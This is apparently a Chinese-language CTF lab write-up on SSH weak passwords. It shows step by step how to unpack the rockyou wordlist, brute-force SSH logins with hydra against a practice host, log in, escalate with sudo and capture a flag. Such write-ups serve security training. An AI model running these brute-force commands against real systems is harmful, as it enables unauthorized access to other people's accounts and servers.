分类:漏洞 2026 年 3 月 30 日

SSH弱口令漏洞

ssh;密码爆破;弱口令
SSH弱口令漏洞相关内容

image-20260330210344871

弱口令

弱口令指的是使用一些简单易猜到的用户名密码,攻击者在不知道用户名密码的情况下,通过暴力破解的形式,成功登录

渗透过程

解压密码字典

# 解压字典(保留原压缩包)
gunzip -k /usr/share/wordlists/rockyou.txt.gz

# 验证文件是否存在
ls -l /usr/share/wordlists/rockyou.txt

image-20260330211107901

使用hydra进行暴力破解

# 示例
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://node.hackhub.get-shell.com:53977

# 使用方法
hydra -l <用户名> -P <字典路径> <协议头>://<目标地址和端口>

image-20260330211317284

远程登录

# 示例
ssh user@node.hackhub.get-shell.com -p 53977

# 使用方法
ssh <用户名>@<地址> -p <端口>

image-20260330211425285

image-20260330211517749

权限不够,提权

sudo -i

image-20260330211649790

取得flag

GetShell{d433d242-ac32-4c56-93b8-5c00fe0d8b25}
文章评论